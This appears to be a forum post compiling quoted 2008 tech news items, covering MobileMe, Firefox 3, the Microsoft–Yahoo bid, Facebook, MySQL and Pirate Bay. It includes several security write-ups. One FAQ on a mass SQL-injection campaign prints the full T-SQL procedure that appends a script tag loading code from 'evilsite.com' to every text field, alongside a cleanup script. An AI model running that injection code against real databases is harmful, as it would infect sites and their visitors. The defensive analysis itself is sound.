"I'm so disgusted with Apple right now I don't even know what to say," said a user identified as "Furi0us.Bee" in a message posted to the longest forum thread on the subject.

"This is crazy," said another user, "mac_wa," on the same thread. "I have had more down time with my mac/me mail than any other service I've had... and I pay for this."

But Owen Schultz had one of the best takes of any user. "Dear MS Outlook," Schultz started, "I am so sorry about our breakup several year ago. I have been thinking about you a lot since then. Will you please consider taking me back? Just one more chance? I'm sorry about all the horrible things I said about you and your operating system. You were the best I ever had! MobileMe and I are finished!"

MobileMe's travails -- ranging from an extended migration from its predecessor, .Mac, to an 11-day mail outage last month -- prompted Apple's CEO, Steve Jobs, to issue a memo to company employees last week in which he called the rollout "not up to Apple's standards."

Jobs shook up Apple's management team over the series of snafus, and handed responsibility for the service to Eddy Cue, who heads iTunes.
[/QUOTE]

Source: www.infoworld.com

[QUTOE]

Las Vegas (NV) – The Internet relies on trust, but what if all that trust comes tumbling down?  That’s exactly the problem noted security researcher Dan Kaminsky described today in his Black Hat talk about DNS cache poisoning.  Several months ago, Kaminsky discovered a vulnerability in the DNS protoctol that allowed bogus name information to be sent to other servers and desktop computers – in essence hackers could redirect web surfers, chat clients and even email servers to machines of their choosing.  Specific details about the vulnerability and the ways to exploit it have been kept secret until today …

Kaminsky is the director of penetration testing for IOActive and specializes in playing around with DNS.  He says he found the vulnerability by accident while he was poking around for other “toys”. To fully understand the bug, let’s go into a brief introduction into how DNS or domain name service works.  Network gurus can probably skip the next few paragraphs.

Almost every Internet service you use, from email to web browsing uses DNS convert the easily remembered names like www.google.com, www.youtube.com and others into IP address like 123.456.789.123.  This conversion is needed because people can remember names easier.  Also companies can change names while keeping all their services pointed to the same numerical IP address.
Behind the scenes, DNS servers make this magic happen by holding a database of DNS records which are lists of names with corresponding IP addresses – think of it as a big list of example.com = 123.456.789.123, example2.com = XXX.XXX.XXX.XXX, etc.  Client computers ask for an IP address by sending a DNS request to the server and the server will reply back with the answer.  Of course servers can only hold so much information, and will hand off the request to a more authoritative server, if it doesn’t know the answer.  The requests can be further bounced up the chain until they reach the ultimate or root domain name servers for the Internet.  If these guys don’t know the answer, then the name to IP address mapping doesn’t exist.
Now imagine yourself as a 411 operator who has to find telephone numbers when asked about a certain place - let’s say Outback Steak House in Torrance, California (our favorite place in the world).  On the first call, you’d probably type it into your computer and wait for the answer, but let’s say the place is really popular and you get tons of calls every day for the place.  Eventually, a smart operator would write the number on a Sticky-Note and post it on the monitor for quick retrieval.  Then when a person calls, you simply read the number on the note, rather than taking the time to type it into the computer.  Well this is exactly what DNS servers do in form of cache.
Kaminksy’s DNS bug, as some people are calling it, exploits this cache by sending malicious requests and once a sufficient number of requests have been sent, the hacker can start rewriting the entries.  It’s important to distinguish that the actual records of the DNS server is not corrupted by this bug, rather it’s the entries in the cache itself.
Kaminsky sat down with us afterwards to give us all the gory details that would make the average man’s head explode, but hey that’s why you come to TG Daily isn’t it.  His attack forces your local domain name server (which is probably your Internet router) to basically perform all the work.  The bad guy forces the DNS server to purposely miss the cache by asking for the IP address of crazy domain names like 1.foo.com, 2.foo.com, 3.foo.com.  Your local domain name server won’t know the details so it then asks other servers to obtain the answer.
As requests and replies flow out and back to your local server, the attacker then unleashes a torrent of specially crafted packets to the victim domain name server.  These packets try to guess the transaction ID of the DNS reply which is a number that ranges from 1 to 65536.  The attacker also has to forward the packet to the correct port which in most cases is the default DNS port 53.
The attack is basically a race of a the hacker stream of DNS replies versus the real reply coming from the real DNS server.  Once the victim DNS server receives a reply with a valid transaction ID, the attacker can substitute any IP address for the domain name.  “The hacker’s packet blows away the response from the real server,” Kaminsky told TG Daily.

Kaminsky was kind enough to draw out the attack for us.  The client computer is on the left and the first node to the right is your local domain name server.

Ok, so I’m sure some of you see two big problems with this.  First, how the heck do you guess the correct transaction ID out of more than 65000 numbers and how do you get the local domain name server to issue the query that starts the whole ball rolling?  Kaminsky says most DNS servers simply increment their transaction ids which makes guessing them fairly trivial.  Also some implementations of DNS are run on a buggy random number generator that produces predictable patterns of numbers.  As far as getting the domain name server to issue the query, Kaminsky told use there are at least eight ways that he knows of and probably tons more that he doesn’t.  “Sometimes you can just ask and the server will issue a query, but it’s amazingly easy to get a DNS server to look something up,” he said.

So what does a hacker gain from attacking DNS servers?  According to Kaminsky, owning the .COM dns space would get you pretty much anything you wanted.  Everything from intercepting emails to taking over spam filters could be accomplished.  He even outlined grabbing passwords to webmail and other services by exploiting the “Forgot Your Password” feature used by many vendors.  But perhaps the biggest risk was to SSL security because certificate vendors could be duped into giving certs to bogus companies.

SSL certificate authorities issue the certificates by identifying the applicant through email.  The vendor looks up the domain’s address in WHOIS and then sends an email to the mail address contained in the record.  But if you were able to poison the DNS to redirect Microsoft’s DNS entry, then you could conceivably gain a Microsoft or another large company’s certificate.
Kaminsky found the bug approximately five months ago and initially worked solely with vendors to patch the bug because he feared any leak would invite malicious hackers into taking over the Internet.  “I spent the last few months terrified that companies would have their emails stolen because of a bug I found,” he told us. 
Kaminsky was lambasted by some security researchers because hackers, by their very nature, are quite the peer oriented group.  Those critics were eventually silenced after Kaminsky had a conference call with the doubters.
In a press conference after the talk, Kaminsky told reporters that vendors have been “fantastic” in responding and patching the bug.  Microsoft even hosted a summit on March 31st where Kaminsky and fellow researchers flew to Redmond Washington in a marathon session to hammer out a fix – something that took thousands of man hours and “thousands of pizzas”.
That patch, dubbed the “sledgehammer fix” by Kaminsky, randomized the transaction IDs and upped the range to more than a 100,000,000 possibilities.  Hopefully a competent IT administrator would notice hundreds of millions of malicious packets hitting their DNS servers, Kaminsky said.
On July 8th, most of the major vendors like Microsoft, Sun, Cisco and Red Hat had patched their servers and Kaminksy has stayed in constant contact with major web companies like MySpace, Craigslist and eBay, all in the hopes of educating IT administrators of the problem.  “I’ve been on the phone a lot, a whole lot,” he said, adding that he doesn’t want to look at his mobile phone bill for the last month.
But Kaminsky warns that the danger isn’t completely over and that the next bug may not come with as much warning and the hacker finding it may not be as considerate.  “They probably won’t be as friendly as me,” he said.
[/QUOTE]

Source: www.tgdaily.com

[QUOTE]
One of the biggest “improvements” that Mozilla claims has made its way into Firefox 3 is improved memory usage, in particular, the vanquishing of memory leaks:

"Memory usage: Several new technologies work together to reduce the amount of memory used by Firefox 3 over a web browsing session. Memory cycles are broken and collected by an automated cycle collector, a new memory allocator reduces fragmentation, hundreds of leaks have been fixed, and caching strategies have been tuned."

We’re sorry to have to break it to you, but if you thought it was too good to be true you were right. Firefox still uses a lot of memory – way too much memory for a web browser.

We haven’t seen it reach 1GiB+ like we have with previous versions, but it’s quite normal for Firefox 3 to be sucking up ~300MiB of memory right off the bat, without a memory leak (the difference between memory leaks and normal memory abusage is that in a memory leak you’ll see the memory usage keep increasing the longer the browser is open/in-use).

This is a screenshot of Firefox’s memory usage after just a half hour or so with only a couple of HTML-only tabs open. This particular screenshot was taken on Linux where Firefox is using the shared GTK libraries – on our Windows PCs, it’s normal to find Firefox 3 taking up ~350MiB or so on both XP and Vista.

The sad thing is that isn’t caused by one of the memory leaks that plagued previous versions of Firefox. It’s Firefox 3 is supposed to take up that much memory – at least, that’s our assumption given how we’ve never seen it take up less.

Firefox 3 has a number of memory-hogging features added to the mix that are probably at least partially responsible for the absolutely gargantuan memory footprint. For example, Firefox now uses an SQL engine to keep track of your history and bookmarks, amongst other things. While that particular feature is powered by SQL-lite, which should – in theory – not take up too much memory, we’re at a loss to explain what else is wasting memory left, right, and center in the world’s most-popular open source web browser.

Things like full-text on-the-fly searching of the web cache for when you type text in the address bar certainly have an impact as well – that’s a lot of stuff to keep in memory at one time. But Opera 9.5 does the same with a lot less memory, so obviously Firefox 3 is doing something wrong.

It’s a shame that Firefox 3 is on the verge of a release and is so terribly unfit to run on any machine – Windows, Linux, or OS X – with less than at least a couple of gigabytes of memory.
[/QUOTE]

Source: http://neosmart.net/

[QUOTE]
Reports about the massive infection of web sites by an automated tool, whose most recent prominent victims have been United Nations, UK Government and the U.S. Department of Homeland Security raised some recurring questions which are worth answering.

1. The attack is targeting Microsoft IIS web servers. Is there a Microsoft vulnerability?
2. What can I do if I’m the administrator of an infected site?
3. What should I do as an user to protect myself?
4. How can NoScript protect if the compromised sites are in my trusted whitelist?

“Exploits of a Mom” by xkcd

1. The attack is targeting Microsoft IIS web servers. Is it exploiting a Microsoft vulnerability?

   Yes and no. Web developers (or their employers who did not mandate proper security education) are to blame for each single infection, because the SQL injection exploited to infect the web sites is possible thanks to trivial coding errors.
   That said, the attackers are targeting IIS web servers which run ASP for a reason.
   Crackers put together a clever SQL procedure capable of polluting any Microsoft SQL Server database in a generic way, with no need of knowing the specific table and fields layouts:
   
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR
FOR select a.name,b.name from sysobjects a,syscolumns b where
a.id=b.id and a.xtype='u' and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN
Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+
''<script src=http://evilsite.com/1.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor;

   This is the “secret sauce” which is allowing the attack to reach its impressive numbers, and it works exclusively against Microsoft database technology — but it’s a feature, not a bug (no irony intended this time). Anyway, the chances for such “powerful” DB technology of being used in conjunction with web servers different than IIS are very low.
   So, to recap:

   1. There’s no Microsoft-specific vulnerability involved: SQL injections can happpen (and do happen) on LAMP and other web application stacks as well.
   2. SQL injections, and therefore these infections, are caused by poor coding practices during web site development.
   3. Nonetheless, this mass automated epidemic is due to specific features of Microsoft databases, allowing the exploit code to be generic, rather than tailored for each single web site. Update: more details in this comment.

   In my previous coverage of similar incidents I also assumed a statistical/demographic reason for targeting IIS, since many ASP developers having a desktop Visual Basic background underwent a pretty traumatic migration to the web in the late 90s, and often didn’t really grow enough security awareness to develop safe internet-facing applications.

2. What should I do if I’m the administrator of an infected site?

   First of all, you should call your web developers (or even better, someone who specializes in web application security) and require a full code review to find and fix the SQL injection bugs.
   In the meanwhile you should either put your database offline or recover clean data from a backup, but until the code review is done be prepared to get compromised again. Deploying a web application firewall may mitigate the emergency, but you must understood it’s a merely temporary work-around — the solution is fixing the code (learn from the United Nations tale).
   If you’ve got no clean database backup, you could try to recover by brutally reversing the SQL attack:
   
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR
FOR select a.name,b.name from sysobjects a,syscolumns b where
a.id=b.id and a.xtype='u' and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN
Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
exec('update ['+@T+'] set ['+@C+']=reverse(right(reverse(['+@C+']),
patindex(''%tpircs<%'', reverse(['+@C+']))+7))
where ['+@C+'] like ''<script%</script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor;

   This SQL procedure walks through your tables and fields, just like its evil prototype, but rather than appending the malicious JavaScript with
   
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+
''<script src=http://evilsite.com/1.js></script>''')

   it locates and removes it with
   
exec('update ['+@T+'] set ['+@C+']=reverse(right(reverse(['+@C+']),
patindex(''%tpircs<%'', reverse(['+@C+']))+7))
where ['+@C+'] like ''<script%</script>''')

   Notice that I’ve not tested my code above, and I’m just providing it as a courtesy: use it at your own risk, after doing a backup of your data.

3. What should I do as an user to protect myself?

   OK, this one is the easiest :)

4. How can NoScript protect if the compromised sites are in my trusted whitelist?

   Even if the compromised site is in your whitelist, allowed to run JavaScript, the malicious scripts are hosted on external servers controlled by the attackers (e.g. www.nihaorr1.com): therefore NoScript prevents them from being loaded and effectively defeats the attack.

[/QUOTE]

Source: http://hackademix.net/2008/04/26/mass-attack-faq/

[QUOTE]
Websense Security Labs ThreatSeeker™ technology has discovered that spammers in their recent tactics have drawn their attention towards traditional and infamous Hotmail, aka Live Hotmail services after the streamlined Live Mail Anti-CAPTCHA operations. Spammers have managed to create automated bots that are capable of not only signing up and creating random Hotmail accounts, but also use these accounts for spamming purposes from a proper Live Hotmail service. Websense predictions about this sophisticated spammer strategy at the time of Live Mail Anti-CAPTCHA and Gmail Anti-CAPTCHA operations, and its outcomes have been factual with this attack.

Websense believes that there are four main advantages to spammers from this approach. First, the Microsoft domain is unlikely to be blacklisted. Second, they are free to sign up. Third, the integration of Hotmail with wide range of Windows Live services. And fourth, it may be hard to keep track of them as there are millions of users worldwide using the service.
Let’s see the entire automated process in two stages.

Stage 1: Signing up and creating accounts successfully.
Part 1: Observe the bot hooking itself on to Internet Explorer browser on victims’ machine.

Part 2: Observe the set of pre-determined account names injected on to victims’ machine which bot attempts to sign-up over victims’ machine.

Part 3: The bot uses Internet Explorer browser in the background on the victims’ machine for attempting Hotmail account sign-up process.

Part 4: Observe the bot visiting Microsoft Hotmail account sign-up page, trying to grab CAPTCHA, and sending it to CAPTCHA breaking host for account creation.

Part 5: Try-break, try-break, try-break.

Part 6: Observe CAPTCHA images being collected as hidden files from victim’s machine during different account sign-up attempts.

Part 7: Unlike, Live Mail CAPTCHA break process, in this attack, the CAPTCHA breaking host communication with the victims’ machine is scrambled. It is observed that 8 characters in the CAPTCHA code are returned instantly during the sign-up, after the CAPTCHA image is sent to the breaking host. The bot infected or victims’ machine descrambles it to signup the account successfully.

Part 8: Observe that account is being signed up and created successfully.

Part 9: The created account credentials are returned back to CAPTCHA breaking host.

The entire process is automated and carried out in iterative manner until all the accounts are successfully signed up in the list injected (initially) on to victims’ machine (refer to Stage 1, Figure 1.2).
Stage 2: Spamming using created accounts from a proper Hotmail Server
Once all the accounts in the list (refer to Stage 1, Figure 1.2) are signed up by the bot, they are then picked randomly and used for spamming purposes.
Part 1: Observe the login process in action.

Part 2: Login process in further progress.

Part 3: Proper login in progress over SSL page.

Part 4: Observe the bot attempted a successful login on to a proper Live Hotmail Server page.

Part 5: Observe the bot attempting to initiate the edit process or composing a message for spamming.

Part 6: Spam message build in progress by the bot.

Part 7: Bot successfully filling in the "from email address list", “to email address“ lists , email subject, and the body to be included in the message for spamming purposes, there by competing its task.

End of message! Spam is being sent to targeted accounts.
Part 8: Finally the account is logged out to continue it similar operation with next email account.

Part 9:The entire process in action that is carried out in iterative manner to perform mass-mailing from different accounts created by the bot.

Spammers finally have success advertising their product.

Observations:
Stage 1: One in every 8 to 10 attempts to signup a hotmail account are successful. Hence success rate approximately ranges between 10 to 15%.
Stage 2: Spam campagins from one Hotmail account is sent to multiple accounts in CC and BCC list at a time. The same Hotmail account (or “from account/ address”) is not repeatedly used for sending spam campaigns continuously. They are changed in timely fashion by the bot. The same is the case with targeted accounts (or “to account(s)/ addresses) for spamming.
Additional Information:
It is observed that unlike Live Mail Anti-CAPTCHA and Gmail Anti-CAPTCHA operations in the past, the current attack is aggressive and instantaneous in terms of CAPTCHA breaking host turn-around time.
In the current attack, the response time of CAPTCHA breaking host after grabbing a CAPTCHA image from a victims’ machine, analyzing it, and responding back to victims’ machine with corresponding CAPTCHA code is relatively lower when compared to previous attacks.
Note 1: It is observed that the total response time for CAPTCHA breaking on the average is only about 6 seconds*.

Note 2: The timing on the request/response in this current attack clearly indicates the possibility of an automated system at the spammers’ end performing the Anti-CAPTCHA operation.
Websense believes that these accounts could be used by the spammers at any time for a variety of social-engineering attacks in future. A wide range of attacks (both manual and automated) would be possible using the same account credentials on other significant Live services integrated with Live Hotmail services offered by Microsoft Corporation, such as Live Messenger (instant messaging), Live Spaces (online storage), etc.

Note: For more information on Hotmail aka Live Hotmail and Live services, see the Hotmail, Live Hotmail and Live Mail entries on Wikipedia.
[/QUOTE]

Source: http://securitylabs.websense.com/

[QUOTE]
[...]
"It's about time. Great for Microsoft. Great for Yahoo shareholders. These Internet markets are winner-take-all markets and they cannot be built. Time is too valuable. Yahoo has one of the best positions on the Internet because it's integrated brand (advertising) with search.
[...]
"They have to do it because they've tried everything they can do to fix MSN. Yahoo is the most visited site in the world, so it goes without saying that given the current valuation, this is the perfect time for them to buy it. "Google is running away with the search market and that's obviously the best part of the market. The likelihood that Google gets caught is slim to none. "You might not catch Google, but you can still be a legitimate player."
[...]
"We think it is great for Yahoo shareholders. This consolidates the marketplace down to Google versus Microsoft. Their multiple areas overlap -- not just search but also applications. Google's been pushing hard into the application space. "Yahoo mail continues to be much slower than the Gmail product. Yahoo search continues to lose share to Google. Asked whether Google might counterbid for Yahoo he said, "There is really nothing there that Google wants that they (Google) don't have."
[...]
"Microsoft has been getting more aggressive with acquisitions. We've seen them start to step up and buy large public players. Strategically, it makes sense. "It's a fair price. Clearly Yahoo shares have been under pressure. Microsoft wants to get it done, and get it done quickly. Trying to offer them a 10 percent premium would be kind of foolish. You'd create a problem, you'd let other bidders get into the fray.
[...]
[/QUOTE]

More on: http://www.reuters.com/

[QUOTE]
The openness of the Internet is what made Google -- and Yahoo! -- possible. A good idea that users find useful spreads quickly. Businesses can be created around the idea. Users benefit from constant innovation. It's what makes the Internet such an exciting place.

So Microsoft's hostile bid for Yahoo! raises troubling questions. This is about more than simply a financial transaction, one company taking over another. It's about preserving the underlying principles of the Internet: openness and innovation.

Could Microsoft now attempt to exert the same sort of inappropriate and illegal influence over the Internet that it did with the PC? While the Internet rewards competitive innovation, Microsoft has frequently sought to establish proprietary monopolies -- and then leverage its dominance into new, adjacent markets.

Could the acquisition of Yahoo! allow Microsoft -- despite its legacy of serious legal and regulatory offenses -- to extend unfair practices from browsers and operating systems to the Internet? In addition, Microsoft plus Yahoo! equals an overwhelming share of instant messaging and web email accounts. And between them, the two companies operate the two most heavily trafficked portals on the Internet. Could a combination of the two take advantage of a PC software monopoly to unfairly limit the ability of consumers to freely access competitors' email, IM, and web-based services? Policymakers around the world need to ask these questions -- and consumers deserve satisfying answers.

This hostile bid was announced on Friday, so there is plenty of time for these questions to be thoroughly addressed. We take Internet openness, choice and innovation seriously. They are the core of our culture. We believe that the interests of Internet users come first -- and should come first -- as the merits of this proposed acquisition are examined and alternatives explored.
[/QUOTE]

Source: http://googleblog.blogspot.com/

[QUOTE]
Want to know about how privately held Facebook is doing from a financial point of view?

Well, just ask Mark Zuckerberg!

This afternoon, at an all-hands meeting held in a Palo Alto, Ca. theater near the social networking site’s headquarters, the 23-year-old founder was quite voluble on that topic, outlining numbers that a more experienced CEO might think twice about unveiling to a large audience.

With an open dial-in number! Many employees, in fact, were horrified that Zuckerberg would be so blabby about such important financial information. Others loved it.

Most were simply surprised (although, to be fair, Google Co-Founders Larry Page and Sergey Brin used to give a lot of detailed company info to their employees before going public, but in coordination with other execs).

“I can’t believe he was doing it,” said one. “It was really unbelievable.”

Believe it! Some highlights?

Revenue for Facebook for 2007 will be $150 million, as has been widely reported. But for 2008, Zuckerberg projected revenue to be increased to $300 to $350 million.

More interesting was the news that Facebook would spend $200 million next year on capital expenditures, which is a whole lot of servers.

By the way, more expenses, noted chatty Mark, those employee levels would rise to more than 1,000 in 2008 from 450 now.

And Zuckerberg also said the company’s EBITDA–earnings before interest, taxes, depreciation and amortization and a number widely used by Wall Street as an indication of operating performance–would be $50 million in 2008.

That means, the company would have a negative cash flow of about $150 million (EBITDA minus CapEx), rather than break even, as it does now.

But who’s counting? Zuckerberg apparently said he did not care about maintaining EBITDA anyway.

That’s because Facebook collected $300 million in investments recently from Microsoft and other investors, which pegged the valuation of the company at $15 billion.
[/QUTOE]

Source: http://kara.allthingsd.com/

[QUOTE]
Sweden plans this week to charge the people running Pirate Bay, one of the world's most visited websites, with being accessories in breaking copyright law.

Pirate Bay helps web surfers share copyrighted music and film files, which is illegal in many countries, including Sweden.

Public prosecutor Hakan Roswall said last week he will charge the Swedish site's organisers with accessory and conspiracy to break copyright law, which could lead to fines or up to two years in prison.

The charges will be filed in a district court on January 31.

The Motion Picture Association of America and the International Federation of the Phonographic Industry (IFPI) are among those who have called for action to shut down the site.

No copyright material is stored on Pirate Bay's servers and no swapping of files actually takes place there. Rather, Pirate Bay locates file sharers on the Internet and acts as a directory of so-called torrent files.

BitTorrent is a protocol that enables big file transfers. The torrent files, downloadable from Pirate Bay, contain the information needed to download film or music files from others.

"It's not merely a search engine. It's an active part of an action that aims at, and also leads to, making copyright protected material available," Roswall told Reuters.

"It's a classic example of accessory - to act as intermediary between people who commit crimes, whether it's in the physical or the virtual world," he said.

But the people behind the site say they cannot be held responsible for material that is being spread.

"It's idiotic. There is no legal ground (for the charges)," Pirate Bay spokesman Peter Sunde told Reuters.

The case is partly based on evidence collected in a 2006 raid against Pirate Bay's servers, located then in Stockholm.

Pirate Bay was started by a Swedish anti-copyright group in 2003. Later the site was run by Sunde and two others, Gottfrid Svartholm and Fredrik Neij. Neij owns the domain.

It does not charge users and earns money from advertisers.

Roswall said it could take more than convictions in Sweden to stop Pirate Bay. "Because the infrastructure is scattered among several places around the world... no separate country will be able to stop the site," he said.

But he believes advertisers could have second thoughts about using Pirate Bay if a guilty verdict is handed down. "That can be the sort of thing that influences the site in the long run."

Sunde said there were no plans to shut down the site in the event of a conviction. He said he, Svartholm and Neij were unaware of the location of Pirate Bay's current servers.

He said Pirate Bay had 2.5 million registered members and about as many visit the site every day.

In 2007, some 600,000 out of nine million Swedes downloaded feature films, according to Mediavision. The Swedish research firm expects the number to rise to some 800,000 this year.

IFPI estimates there are 20 illegal music downloads worldwide for every one legal sale, IFPI spokesman Alex Jacob said.
[/QUOTE]

Source: Reuters, http://www.smh.com.au/

[QUOTE]

Sun Microsystems is taking the plunge into the database market with the purchase of open source database developer MySQL for $1 billion ($800 million in cash in exchange for all MySQL stock and assumption of approximately $200 million in options).

With the move, announced Wednesday, Sun takes a big leap into the $15 billion database market and pits it against the likes of Microsoft, IBM and Oracle. MySQL (all resources) also gives Sun entry to some customers that may be interested in buying more equipment and software. MySQL counts Facebook, Google, Nokia and Baidu as customers.

During a conference call this morning Sun and MySQL executives sang kumbaya. On the call, Sun CEO Jonathan Schwartz called the MySQL deal the “most important acquisition in history of company” and added that the database firm will have “a central role” as Sun rolls out its open source strategy. Sun is in the process rolling up a complete open source stack, becoming the largest open source organization of world.

Here’s what makes MySQL interesting to Sun. About 20 percent of MySQL deployments run on Solaris, according to Sun estimates outlined on a conference call. Seventy five percent of MySQL deployments are not on Sun hardware. That gives Sun an opportunity to bundle hardware software and services. Although Schwartz noted that the software and hardware business operate separately MySQL could give Sun some leverage as customers look to consolidate vendors.

Sun (all resources) can also distribute MySQL through its channel and OEM partnerships and create various bundles. The overarching goal is to give MySQL more “commercial appeal” and boost adoption of open source software in the enterprise.

In a statement, Schwartz said the MySQL purchase puts his company at “the center of the global Web economy” since the open source database provider is entrenched at Web giants. MySQL is included in that platform that includes Linux, Apache and PHP/Perl commonly known as LAMP.

Schwartz followed up on his blog:

We’re putting a billion dollars behind the M in LAMP. If you’re an industry insider, you’ll know what that means - we’re acquiring MySQL AB, the company behind MySQL, the world’s most popular open source database.

You’ll recall I wrote about a customer event a few weeks ago, at which some of the world’s most important web companies talked to us about their technology challenges. Simultaneously, we gathered together some of the largest IT shops and their CIO’s, and spent the same two days (in adjoining rooms) listening to their views and directions.

Both sets of customers confirmed what we’ve known for years - that MySQL is by far the most popular platform on which modern developers are creating network services.

One big question is what Sun does next to build out its stack of open source software and other applications covering middleware, storage and virtualization. Sun’s software lineup now includes Java, MySQL, OpenSolaris and GlassFish.

The company can now pair MySQL with Solaris and could fill out its roster with other targeted acquisitions. A large scale merger with a company like Red Hat is probably a non-starter though given Sun’s infatuation with Solaris.

Sun plans to integrate MySQL into its software, sales and service groups and MySQL CEO Marten Mickos will stay after the acquisition.

Mickos on the conference call added that the deal makes “wonderful sense” because the combined company can offer a diversified software stack to multiple platforms.

In a statement Mickos said, “Sun’s culture and business model complements MySQL’s own by sharing the same ideals that we have had since our foundation — software freedom, online innovation and community and partner participation.”

Marten Mickos, MySQL CEO, joins the Sun open source soul train and managed a healthy exit for his company’s founders and investors, which includes Benchmark Capital, Institutional Venture Partners, Index Ventures, Holtron Ventures, Intel Capital, Presidio STX, Red Hat, Scope Capital and various angels.

Other questions about the deal remain. Among them:

How will the MySQL community handle being part of Sun? Sun is a member of the open source community, but has been controversial and viewed as late to the game on taking Java to the masses. Sun has contributed a lot, but folks don’t like change. Sun plans to optimize and bundle MySQL with its software and hardware, but if this is viewed as a sales pitch there will be issues. One talkbacker in this post is already skeptical. I’m curious to see the community reaction here.

Schwartz wrote:

MySQL is already the performance leader on a variety of benchmarks - we’ll make performance leadership the default for every application we can find (and on every vendor’s hardware platforms, not just Sun’s - and on Linux, Solaris, Windows, all). For the technically oriented, Falcon will absolutely sing on Niagara… talk about a match made in heaven.

Can Sun bridge the enterprise-startup divide with MySQL? Schwartz on his blog noted the following:

CTO’s at startups and web companies disallow the usage of products that aren’t free and open source. They need and want access to source code to enable optimization and rapid problem resolution (although they’re happy to pay for support if they see value). Alternatively, more traditional CIO’s disallow the usage of products that aren’t backed by commercial support relationships - they’re more comfortable relying on vendors like Sun to manage global, mission critical infrastructure.

That’s an excellent point and presents a conundrum. If Sun makes MySQL more enterprise acceptable does that diminish its mojo with startups? Does it matter?

Mickos said the enterprise-startup bridge is a “big opportunity” and Sun can capitalize on because the MySQL roadmap will be sped up as the two companies focus on scale, performance and integration. “We stand out from most databases,” explained Mickos. “MySQL was developed for online world. Our relevance grows in the enterprise as they shift to Web-based architectures.”

Separately, Sun said it expects to report fiscal second quarter revenue of $3.6 billion and earnings of 28 cents to 32 cents a share. Wall Street is expecting earnings of 29 cents a share on sales of $3.58 billion.

[/QUTOE]

Source: http://blogs.zdnet.com/

[QUOTE]

After a productive and valuable conversation with my publisher, Random House, they've agreed to permit The Future of Ideas to be licensed under a Creative CommonsAttribution-Noncommercial license. You can download the book for free here, or above.

This means all four of my books are now CC licensed. Code (v1) was licensed under a BY-SA license; so too, Code (v2). And Free Culture and now The Future of Ideas are licensed under BY-NC licenses.

I am particularly glad that The Future of Ideas is now freely licensed. That book hit the stores 2 weeks after September 11. I'm glad it now has a chance to flow a bit more freely.

Thanks to Random House (and Basic Books, and Penguin) for being open to this experiment. I hope we'll have some useful data to report about its effect.
[/QUOTE]

Source: lessig.org/blog/

[QUOTE]
One of Hollywood's biggest foes is about to be called on the carpet. After years of steering Web surfers to free entertainment, the organizers of a massive directory of pirated movies, music and software in Sweden could finally face serious legal repercussions.

Based on evidence collected in a 2006 raid on the offices of The Pirate Bay, Swedish prosecutors say that by the end of January they expect to charge the individuals who operate the file-sharing service with conspiracy to breach copyrights.

While Sweden might seem to be an unlikely harbor for pirates of any kind, weak copyright laws, lax enforcement, high broadband penetration and general antipathy toward the entertainment industry have made it a file-sharing free-for-all. Last year, 43% of the people participating in a survey by Sweden's biggest phone company said they planned to download music during the year. A pro-piracy political party has more members than the Greens.

The prosecutors' move comes after years of complaints from Hollywood executives and U.S. government officials. U.S. Embassy officials have described Sweden as home to the "worst Internet piracy in the world," and the Motion Picture Association of America has been fighting to shutter Pirate Bay's site for years.

Sweden, which enjoys some of the world's fastest Internet speeds, strengthened its laws in 2005 to make online theft of movies a crime. But its efforts to crack down have had little success so far. In 2006, shortly after Swedish Justice Department representatives visiting Washington received a stern lecture from U.S. officials about the alleged damage being caused by Pirate Bay, Swedish police raided the site's offices and shut it down.

Although the site was back up within days, the raid inspired hundreds of pro-piracy citizens to take to the streets in protest and led to allegations that the U.S. was interfering in Swedish affairs. Pirate Bay won cult status among file sharers globally, and many Swedes continue to revere its founders as plucky upstarts who dared to take on Hollywood.

Underscoring Sweden's pro-piracy attitude, seven parliamentarians from the ruling conservative party called in a newspaper opinion article last month for the decriminalization of file sharing. "It has become a big part of people's lives," Karl Sigfrid, one of the politicians, said in an interview. "I believe it is impossible to really stop this."

There's no doubt millions of people across the world turn to Pirate Bay whenever they want a free movie, game or piece of software. Its reach is so vast that the family of Ron Goldman has filed suit against the site, claiming in court documents to have lost at least $150,000 because of Pirate Bay. The Goldman family is supposed to receive the proceeds from O.J. Simpson's book "If I Did It," but the text is available free using the directory at ThePirateBay.org.

The trial will probably grapple with complex technical issues. One question is the legality of BitTorrent, a computer program that breaks up large files like movies into small pieces so they can be transferred quickly over the Internet.

Although The Pirate Bay maintains an index of BitTorrent files, the files themselves are stored on the computers of other people around the world. Because the copyright files aren't stored on Pirate Bay computers, the site says it isn't breaking the law. Police, prosecutors and entertainment-industry lawyers say the distinction is bogus. The MPAA estimates The Pirate Bay's Web site generates $60,000 a month in advertising revenue. Pirate Bay spokesman Peter Sunde says he isn't sure about exact revenue numbers, but he maintains that Pirate Bay has never made a profit, in part because of the high cost of maintaining servers around the world.

For all the resources the entertainment industry, the U.S. and Sweden have put into the case, the outcome is far from certain. Even if Sweden wins convictions and jail time, the site won't be shut down immediately. Separate legal action would be required to accomplish that, and it might be beyond the reach of Swedish authorities because Pirate Bay says its computer servers have been moved to other countries. "The suspects hide their information all around the world, and I am pretty sure even if they are convicted that wouldn't stop the service," says Swedish prosecutor Hakan Roswall.

The Pirate Bay's operators say they are expecting the charges and will prepare their defense with the aid of government-funded lawyers for a trial later this year. "We're not worried," says Fredrik Neij, a Pirate Bay co-founder. "We think the law is on our side." The movie industry, which in Europe typically focuses on public-relations campaigns to sway public opinion rather than the lawsuits it uses in the U.S., is hoping that details will emerge to turn the tide against file sharers in Sweden.

That is a tall order given the site's local popularity. For example, the heir to the Wasabröd fortune -- a popular cracker-like snack in Sweden -- has supported the group in the past, allowing a phone company he owned to provide the site with bandwidth and server space in its early days.

